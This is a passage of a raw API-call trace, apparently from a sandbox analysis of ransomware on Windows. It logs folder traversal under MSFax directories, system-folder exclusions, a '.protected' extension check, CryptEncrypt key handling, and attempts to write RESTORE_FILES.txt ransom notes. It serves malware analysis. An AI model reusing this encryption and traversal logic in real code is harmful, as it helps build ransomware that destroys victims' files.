lpString2="$Recycle.bin") returned 1 [0093.292] lstrcmpiW (lpString1="fyi.cov", lpString2="System Volume Information") returned -1 [0093.292] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned 81 [0093.292] StrStrIW (lpFirst="fyi.cov", lpSrch=".protected") returned 0x0 [0093.292] lstrcmpW (lpString1="fyi.cov", lpString2="RESTORE_FILES.txt") returned -1 [0093.292] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.292] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.292] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.292] lstrcmpiW (lpString1="generic.cov", lpString2="Windows") returned -1 [0093.292] lstrcmpiW (lpString1="generic.cov", lpString2="Program Files") returned -1 [0093.292] lstrcmpiW (lpString1="generic.cov", lpString2="Program Files (x86)") returned -1 [0093.292] lstrcmpiW (lpString1="generic.cov", lpString2="$Recycle.bin") returned 1 [0093.292] lstrcmpiW (lpString1="generic.cov", lpString2="System Volume Information") returned -1 [0093.292] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned 85 [0093.292] StrStrIW (lpFirst="generic.cov", lpSrch=".protected") returned 0x0 [0093.292] lstrcmpW (lpString1="generic.cov", lpString2="RESTORE_FILES.txt") returned -1 [0093.292] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.293] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.293] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.293] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\RESTORE_FILES.txt") returned 91 [0093.293] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.293] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.293] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.293] lstrcmpiW (lpString1="urgent.cov", lpString2="Windows") returned -1 [0093.293] lstrcmpiW (lpString1="urgent.cov", lpString2="Program Files") returned 1 [0093.293] lstrcmpiW (lpString1="urgent.cov", lpString2="Program Files (x86)") returned 1 [0093.293] lstrcmpiW (lpString1="urgent.cov", lpString2="$Recycle.bin") returned 1 [0093.293] lstrcmpiW (lpString1="urgent.cov", lpString2="System Volume Information") returned 1 [0093.293] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned 84 [0093.293] StrStrIW (lpFirst="urgent.cov", lpSrch=".protected") returned 0x0 [0093.293] lstrcmpW (lpString1="urgent.cov", lpString2="RESTORE_FILES.txt") returned 1 [0093.293] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.293] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.293] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.293] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.293] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\RESTORE_FILES.txt") returned 91 [0093.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.293] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.293] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.294] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.294] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\RESTORE_FILES.txt") returned 85 [0093.294] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.294] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.294] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.294] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\RESTORE_FILES.txt") returned 85 [0093.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.294] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.294] lstrcmpiW (lpString1="Inbox", lpString2="Windows") returned -1 [0093.294] lstrcmpiW (lpString1="Inbox", lpString2="Program Files") returned -1 [0093.294] lstrcmpiW (lpString1="Inbox", lpString2="Program Files (x86)") returned -1 [0093.294] lstrcmpiW (lpString1="Inbox", lpString2="$Recycle.bin") returned 1 [0093.294] lstrcmpiW (lpString1="Inbox", lpString2="System Volume Information") returned -1 [0093.294] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 55 [0093.294] lstrcmpW (lpString1="Inbox", lpString2=".") returned 1 [0093.294] lstrcmpW (lpString1="Inbox", lpString2="..") returned 1 [0093.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*") returned 57 [0093.294] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.294] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.294] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.294] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.294] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.294] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\.") returned 57 [0093.294] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.294] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.294] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.294] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.294] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.294] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.294] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.294] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\..") returned 58 [0093.294] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.294] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.295] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.295] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.295] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.295] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.295] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.295] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.295] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\RESTORE_FILES.txt") returned 73 [0093.295] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.295] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.295] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.295] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.295] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\RESTORE_FILES.txt") returned 73 [0093.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\inbox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.295] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.295] lstrcmpiW (lpString1="Queue", lpString2="Windows") returned -1 [0093.295] lstrcmpiW (lpString1="Queue", lpString2="Program Files") returned 1 [0093.295] lstrcmpiW (lpString1="Queue", lpString2="Program Files (x86)") returned 1 [0093.295] lstrcmpiW (lpString1="Queue", lpString2="$Recycle.bin") returned 1 [0093.295] lstrcmpiW (lpString1="Queue", lpString2="System Volume Information") returned -1 [0093.295] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned 55 [0093.295] lstrcmpW (lpString1="Queue", lpString2=".") returned 1 [0093.295] lstrcmpW (lpString1="Queue", lpString2="..") returned 1 [0093.295] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*") returned 57 [0093.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.295] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.295] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.295] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.295] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.295] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.295] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\.") returned 57 [0093.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.295] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.295] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.295] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.295] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.296] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.296] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.296] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\..") returned 58 [0093.296] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.296] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.296] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.296] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\RESTORE_FILES.txt") returned 73 [0093.296] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.296] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.296] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.296] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.296] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\RESTORE_FILES.txt") returned 73 [0093.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\queue\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.296] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.296] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.296] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\RESTORE_FILES.txt") returned 67 [0093.296] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.296] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.296] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.296] lstrcmpiW (lpString1="SentItems", lpString2="Windows") returned -1 [0093.296] lstrcmpiW (lpString1="SentItems", lpString2="Program Files") returned 1 [0093.296] lstrcmpiW (lpString1="SentItems", lpString2="Program Files (x86)") returned 1 [0093.297] lstrcmpiW (lpString1="SentItems", lpString2="$Recycle.bin") returned 1 [0093.297] lstrcmpiW (lpString1="SentItems", lpString2="System Volume Information") returned -1 [0093.297] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 59 [0093.297] lstrcmpW (lpString1="SentItems", lpString2=".") returned 1 [0093.297] lstrcmpW (lpString1="SentItems", lpString2="..") returned 1 [0093.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*") returned 61 [0093.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.297] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.297] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.297] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.297] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.297] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\.") returned 61 [0093.297] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.297] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.297] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.297] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.297] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.297] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.297] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\..") returned 62 [0093.297] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.297] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.297] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.297] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.297] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.297] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.297] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.297] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\RESTORE_FILES.txt") returned 77 [0093.297] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.297] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.297] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.297] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\RESTORE_FILES.txt") returned 77 [0093.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\sentitems\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.297] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.298] lstrcmpiW (lpString1="VirtualInbox", lpString2="Windows") returned -1 [0093.298] lstrcmpiW (lpString1="VirtualInbox", lpString2="Program Files") returned 1 [0093.298] lstrcmpiW (lpString1="VirtualInbox", lpString2="Program Files (x86)") returned 1 [0093.298] lstrcmpiW (lpString1="VirtualInbox", lpString2="$Recycle.bin") returned 1 [0093.298] lstrcmpiW (lpString1="VirtualInbox", lpString2="System Volume Information") returned 1 [0093.298] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 62 [0093.298] lstrcmpW (lpString1="VirtualInbox", lpString2=".") returned 1 [0093.298] lstrcmpW (lpString1="VirtualInbox", lpString2="..") returned 1 [0093.298] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned 64 [0093.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.298] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.298] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.298] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.298] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.298] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.298] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\.") returned 64 [0093.298] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.298] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.298] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.298] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.298] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.298] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.298] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.298] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\..") returned 65 [0093.298] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.298] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.298] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.298] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.298] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.298] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.298] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.298] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.298] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 68 [0093.298] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.298] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.298] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned 70 [0093.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.298] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.298] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.299] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.299] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.299] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.299] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows 